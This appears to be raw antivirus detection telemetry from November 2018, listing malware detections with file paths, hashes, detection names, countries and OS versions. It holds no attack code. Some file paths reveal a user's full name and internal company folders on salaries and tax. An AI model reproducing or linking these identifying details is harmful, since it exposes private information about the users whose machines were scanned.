  Row(detection=Row(filename='avscan-20181102-051716-88836b4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051716-88836B4F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060234-dcb61b90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060234-DCB61B90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\ka-GE\\S-1-4-46\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155601-c2011bc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155601-C2011BC1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160309-09f9eb32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160309-09F9EB32', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kerja 2016.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\KONTRAK KERJA\\RENCANA KERJA 2016\\KERJA 2016.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3881178\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\slitherio (1).exe', parentsize=2400760, timestamp='2018-11-01T16:55:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10181478\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Ferrugem - Só As Melhores de Outubro 2018 Ao Vivo_1335299250.exe', parentsize=2515144, timestamp='2018-11-01T19:41:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\ANTIVIRUS\\AVIRASECURITYCENTERAGENT.EXE', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-10-31-07-04-18.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-22T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-01T01:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T13:12:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='di tmpat kerja.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\notulen\\pug di tmpat kerja\\di tmpat kerja.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T14:48:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-01T18:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4735605\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gaji utk pajak.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\RINCIAN GAJI UTK PAJAK\\GAJI UTK PAJAK.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10327267\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:04:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T05:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184739-e753255f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36beaaea\\AVSCAN-20181101-184718-E3B26560\\AVSCAN-20181101-184739-E753255F', filesize=13824000, name='HEUR/AGEN.1035113.#M1.#R1'), hash='3e1ec31401bc1d02c0caf1c6955de4aed1e29063c27410aa9a2082ccd09befc3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:48:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160025-ee7aa74f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160025-EE7AA74F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flash_update.exe', filepath='C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:01:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rome2.dll', filepath='H:\\Total War Rome II Emperor Edition\\Rome2.dll', filesize=26752000, name='W32/Ramnit.CD.#M1.#R1'), hash='1bc1882a15ffcfed8f266998f6b4fb8bdab162d73dfd41a0ae29af57feaebf92', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T14:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='terima seragam.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\TANDA TERIMA SERAGAM\\TERIMA SERAGAM.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-textscan_.exe', filepath='H:\\Restmüll 4\\Downloads\\Downloader-fuer-textscan_.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='76b9bd2286dc9573366783f5fe7d8d181484d5b3c98a61203f6515498a6efb9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T19:55:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rop6sfk', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$ROP6SFK', filesize=64000, name='VBA/Dldr.Agent.qwkws.#M1.#R1'), hash='ea4492824e79af5652bb2098e31e0e857577f8853606ff9c9e7322c5251c2731', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0155039.dll', filepath='g:\\system volume information\\_restore{98857453-17a4-42b1-8085-e71e507860ed}\\rp81\\A0155039.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:22:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='635774fceb7859d5814a2d8d7cdfd05aa9e22878bd399d98d60748e5f4f6a2d0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\635774FCEB7859D5814A2D8D7CDFD05AA9E22878BD399D98D60748E5F4F6A2D0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='635774fceb7859d5814a2d8d7cdfd05aa9e22878bd399d98d60748e5f4f6a2d0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:27:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d89af1ce2554b8c08a71cd125191f07a07ee07f6659a32f1a6f6dcf27b3ad0f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D89AF1CE2554B8C08A71CD125191F07A07EE07F6659A32F1A6F6DCF27B3AD0F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d89af1ce2554b8c08a71cd125191f07a07ee07f6659a32f1a6f6dcf27b3ad0f7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:11:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112028-426d688f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112028-426D688F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:16:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='883de4c89242509f493da942956e3a8a8e20f7294e78897f00f51138fe954c01', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\883DE4C89242509F493DA942956E3A8A8E20F7294E78897F00F51138FE954C01', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='883de4c89242509f493da942956e3a8a8e20f7294e78897f00f51138fe954c01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rcvrse.dll', filepath='D:\\Soft\\Oracle -8\\NT_X86\\V8\\RDBMS\\RCVRSE.DLL', filesize=260000, name='W32/Ramnit.C.#M0.#R0'), hash='c0580ce0dfb1dd16c41c67597238ba7e5ceaa750cdbf786fa6125f982548e0ac', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:28:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110418-c823798a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110418-C823798A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nssF70B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T02:30:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142908-249abd66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142908-249ABD66', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plbjwhbmll.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\8edfd82a46a249989c53e48f509f75f7\\PLBJWHBMLL.exe', filesize=832000, name='ADWARE/Wizrem.Gen7.#M300.#R603867'), hash='9005377ec64a1412b2cea9e204dc3d39b76cf0d4f008f4c59c9b02a5fca40e3f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:36:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC e-Governance Services India Limited\\digipay\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:54:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rebuilt.soap.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\القرآن الكريم -عبدالله خياط\\RECYCLE\\علي المبارك\\جداول الوثائق\\rebuilt.soap.exe', filesize=2688000, name='W32/Small.L.#M1.#R1'), hash='6c1c566b7145fc6047852c2987ba3df5d04823bd59e2c90701cc43abce2a48da', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:26:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mohaa.exe', filepath='\\?\\J:\\Medal of honor\\ميدل  جديد\\MOHAA.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='b2645735923cd40c3837e5221beeb07c5f2bca800624b19de81eeccb28e95d62', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rapat 1 (pembentukan tim) 130418.exe', filepath='I:\\PPKD\\Rapat 1 (Pembentukan Tim) 130418\\Rapat 1 (Pembentukan Tim) 130418.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R3740'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T02:23:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:01:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igdumdim32.dll', filepath='C:\\Drivers\\Video\\Intel1\\HD3\\igdumdim32.dll', filesize=7936000, name='W32/Ramnit.CD.#M1.#R1'), hash='04e8d122fb6aa507bb7e7852d0402a9cb820fe1ab2a73649f876df5b1033c4eb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1675264, timestamp='2018-11-01T19:55:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234023-72cb439d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73bebb3c\\AVSCAN-20181101-233959-6FC11B3E\\AVSCAN-20181101-234023-72CB439D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:40:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220828-f5cdc4cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b0a87a3\\AVSCAN-20181101-220813-F343C351\\AVSCAN-20181101-220828-F5CDC4CD', filesize=320000, name='TR/Hosts.liurq.#M1.#R1'), hash='46bb9ee539835e8f3b412227226b3cf1c69e9180ba51f719fcc9965d41ed2d75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:08:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='F:\\MaZiKa2daY.CoM.Top.Zuma.By.IneXaTo\\autorun.exe', filesize=5312000, name='W32/Sality.AT.#M1.#R1'), hash='691e153de8fa7bd44a35a47001436303c53337c84c7e083e6c455a8287f12e1c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T20:36:55Z'), dt=datetime.date(2018, 11, 1)),
